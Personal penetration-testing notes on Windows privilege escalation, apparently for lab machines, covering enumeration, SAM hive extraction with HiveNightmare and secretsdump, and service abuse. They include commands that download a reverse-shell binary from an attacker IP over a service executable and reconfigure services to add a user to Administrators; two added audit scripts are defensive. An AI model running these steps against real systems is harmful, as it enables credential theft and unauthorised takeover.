Systeminfo#

  • Under Hotfix(s), look up those KB numbers to see when the system was last patched
  • OS Version and System Boot Time are also good indicators
  • Network Card(s) lists every connected NIC. In an enterprise environment, segmentation is usually done with VLANs and firewall rules rather than separate physical cables

systeminfo

If Hotfix(s) isn't showing anything, possibly because a non-admin user isn't allowed to see it, we can use this instead

wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe list brief

And this

Get-HotFix | ft -AutoSize

Or this

[System.Environment]::OSVersion.Version
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'

Here is where you can look up the build, version, etc.

Wikipedia, CVEDetails

Get-WmiObject -Class Win32_OperatingSystem | select Description

Domain, users, groups, policies#

Domain#

Print the domain name and the domain controller

echo %USERDOMAIN%
echo %logonserver%

Find domain controllers

dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName

Users#

Current user's privileges (see this)

whoami /priv

Current user’s groups

whoami /groups

All local users

net user

All local users, with description

Get-LocalUser

Groups#

All local groups

net localgroup

Group info

net localgroup administrators

Password Policy#

net accounts

User Interaction#

See more at 06. Privilege Escalation/Windows/User Interactions

Check whether anyone else is logged in

qwinsta
query user

AlwaysInstallElevated#

Check permission

# should return 0x1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Unattend#

type C:\Panther\Unattend.xml

SAM#

Windows.old#

No special permissions are needed to check for this

dir C:\Windows.old\

If the directory exists, go to this location and copy SAM, SYSTEM and SECURITY back to our machine

cd C:\Windows.old\Windows\system32\config\

Once the three hives are on our machine, extract the hashes

impacket-secretsdump -sam sam -system system -security security local

Weak permission#

If we have read (RX) permission on these files, we're good: the hives can be copied.

icacls c:\Windows\System32\config\SAM
icacls c:\Windows\System32\config\SYSTEM
icacls c:\Windows\System32\config\SECURITY

Github Page

Download the binary, then transfer it to the target machine

wget https://github.com/GossiTheDog/HiveNightmare/releases/download/0.6/HiveNightmare.exe

Then run on target machine

.\HiveNightmare.exe

Powershell history#

(Get-PSReadlineOption).HistorySavePath
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Installed software#

Always use this first; painful lesson learned. The other commands might miss some packages.

$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation

$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation

$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

If FileZilla or PuTTY is installed, run LaZagne

wmic product get name
Get-WmiObject -Class Win32_Product |  select Name, Version

Environment variable#

Look out for PATH and HOMEDRIVE:

  • If PATH has been modified and we can write to one of its directories, we can do DLL hijacking (search-order abuse)
  • If HOMEDRIVE is a shared (network) drive, we can put malware in USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

set
Get-ChildItem Env: | ft key,value

Autorun#

Any startup programs?

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

Check our permissions on each binary; if we can write to it, replace it with a revshell binary, then wait until that user logs in

Scheduled tasks#

schtasks /query /fo LIST /v
Get-ScheduledTask | select TaskName,State

COM Objects#

I don't know what I'm writing here right now; check this out later and write it up properly

reg query HKCR\CLSID /s
get-acl "Registry::HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" | fl

Services#

Listening ports (this command also returns the PID of the process that opened each port)

netstat -ano

All services

tasklist /svc

Filter service with pid

tasklist /svc /FI "PID eq 2188"

SharpUp#

Github Page

Compiled binary

Download the binary and transfer it to the target machine

wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/refs/heads/master/SharpUp.exe

Run

.\SharpUp.exe audit

After running this, you will get a list of vulnerable services; note down the PATHNAME.

Modifiable Service Binaries#

PATHNAME: "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Check our permissions on that executable

icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Then replace it with a reverse shell binary

wget http://10.10.14.45/revshell.exe -o "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Modifiable Services#

Name: WindscribeService

Download, unzip and transfer AccessChk from the Sysinternals suite

wget https://download.sysinternals.com/files/AccessChk.zip
unzip ./AccessChk.zip

Check service permission

accesschk.exe /accepteula -quvcw WindscribeService

Exploit

sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
sc stop WindscribeService
sc start WindscribeService

Unquoted service path#

Search

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

The binary path will look like this, unquoted

C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe

If the path is unquoted, Windows will attempt to load these binaries, in this order:

  • C:\Program.exe
  • C:\Program Files.exe
  • C:\Program Files (x86)\System.exe
  • C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe

So we can place a revshell binary at one of those locations, if we have permission to write there, and then wait for the service to restart.

Oftentimes this is not exploitable for exactly those reasons: a standard user cannot write to those directories, or cannot restart the service.
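The candidate list above is one instance of a general rule: Windows tries every space-delimited prefix of an unquoted path (with .exe appended) before the real binary. The following audit script is an added example, not part of the original notes, that applies that rule to every service, checks whether the current account can create files in each candidate's parent directory, and prints the quoted ImagePath that fixes it. It assumes PowerShell 5.1 or later on Windows and should be run as the low-privileged account being audited.

```powershell
# Added example (not from the original notes): audit services for unquoted ImagePath
# values, list the candidates Windows would probe before the real binary, and flag any
# candidate whose parent directory the current user can create files in.
function Test-DirectoryWritable([string]$Dir) {
    # Probe by creating and deleting a random file; Get-Acl alone would need full
    # group resolution to answer this reliably for the current token.
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Get-UnquotedServicePath {
    $svcRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($key in Get-ChildItem -LiteralPath $svcRoot -ErrorAction SilentlyContinue) {
        $image = (Get-ItemProperty -LiteralPath $key.PSPath -ErrorAction SilentlyContinue).ImagePath
        if (-not $image) { continue }
        $image = [Environment]::ExpandEnvironmentVariables($image)
        # Only unquoted .exe paths that contain a space, outside the Windows directory
        if ($image.StartsWith('"') -or $image -notmatch '^(?<exe>[^"]+?\.exe)') { continue }
        $exe = $Matches.exe
        if ($exe -notmatch ' ' -or $exe -like "$env:SystemRoot*") { continue }
        $arguments = $image.Substring($exe.Length)
        # Windows tries each space-delimited prefix (plus .exe) before the real file
        $words = $exe -split ' '
        $candidates = @(for ($i = 1; $i -lt $words.Count; $i++) {
            ($words[0..($i - 1)] -join ' ') + '.exe'
        })
        foreach ($cand in $candidates) {
            $parent = Split-Path -LiteralPath $cand -Parent
            [pscustomobject]@{
                Service        = $key.PSChildName
                ImagePath      = $image
                Candidate      = $cand
                ParentWritable = Test-DirectoryWritable $parent
                # Remediation: quote the executable path; arguments stay outside the quotes
                FixedImagePath = '"' + $exe + '"' + $arguments
            }
        }
    }
}

Get-UnquotedServicePath | Where-Object ParentWritable | Format-Table -AutoSize
```

Drop the Where-Object filter to see every unquoted service path, writable or not.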

Weak registry permission#

Download, unzip and transfer AccessChk from the Sysinternals suite

wget https://download.sysinternals.com/files/AccessChk.zip
unzip ./AccessChk.zip

Checking for Weak Service ACLs in Registry

accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

If we have RW on a service's registry key, we're good. Change its binary path to our command

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "cmd.exe /c net localgroup administrators htb-student /add"
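The accesschk command above answers "which service keys can this user modify?" for one named principal. The script below is an added example, not part of the original notes, that answers the same question from the current token's own SIDs (user plus enabled groups) by reading each service key's ACL with Get-Acl, so it needs no extra binary. It assumes PowerShell 5.1 or later on Windows and should be run as the low-privileged account being audited.

```powershell
# Added example (not from the original notes): list service registry keys that the
# current token can modify. Only Allow ACEs are evaluated; an explicit Deny ACE for one
# of the token's SIDs would still block access, so treat hits as candidates to verify.
function Get-WritableServiceKey {
    $svcRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    $token   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    # .NET's Groups property already excludes deny-only groups (e.g. a UAC-filtered
    # Administrators membership), so this reflects the effective token.
    $mySids  = @($token.User) + @($token.Groups) | ForEach-Object { $_.Value }
    # Rights that let a caller change what the service runs (ImagePath, etc.).
    # Generic bits show up on some inherited ACEs, so include them explicitly.
    $writeMask = [int][System.Security.AccessControl.RegistryRights]::SetValue -bor
                 [int][System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
                 [int][System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
                 [int][System.Security.AccessControl.RegistryRights]::TakeOwnership -bor
                 0x10000000 -bor 0x40000000    # GENERIC_ALL, GENERIC_WRITE
    foreach ($key in Get-ChildItem -LiteralPath $svcRoot -ErrorAction SilentlyContinue) {
        $acl = Get-Acl -LiteralPath $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($rule in $acl.Access) {
            if ($rule.AccessControlType -ne 'Allow') { continue }
            try {
                $sid = $rule.IdentityReference.Translate(
                    [System.Security.Principal.SecurityIdentifier]).Value
            } catch { continue }   # orphaned or untranslatable identity
            if ($mySids -notcontains $sid) { continue }
            if (([int]$rule.RegistryRights -band $writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $key.PSChildName
                Identity  = $rule.IdentityReference.Value
                Rights    = $rule.RegistryRights
                ImagePath = (Get-ItemProperty -LiteralPath $key.PSPath -ErrorAction SilentlyContinue).ImagePath
            }
        }
    }
}

Get-WritableServiceKey | Format-Table -AutoSize
```

Any service reported here should have its key ACL tightened so that only Administrators and SYSTEM can write to it.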

Named pipes#

Listing pipes#

Download Sysinternals PipeList, unzip it and transfer it to the target machine

wget https://download.sysinternals.com/files/PipeList.zip
unzip PipeList.zip

Then we can begin enumeration

pipelist.exe /accepteula

Or we can use the PowerShell Get-ChildItem cmdlet and not download anything

gci \\.\pipe\

View pipe permissions#

Download Sysinternals AccessChk, unzip it and transfer it to the target machine

wget https://download.sysinternals.com/files/AccessChk.zip
unzip AccessChk.zip

Then we can view the permissions of a pipe we're interested in

accesschk.exe /accepteula \\.\Pipe\lsass -v

Use this Metasploit module if there is a WindscribeService pipe that we can read and write

Misc#

# Get PS module currently loaded
Get-Module
# Execution policies
Get-ExecutionPolicy -List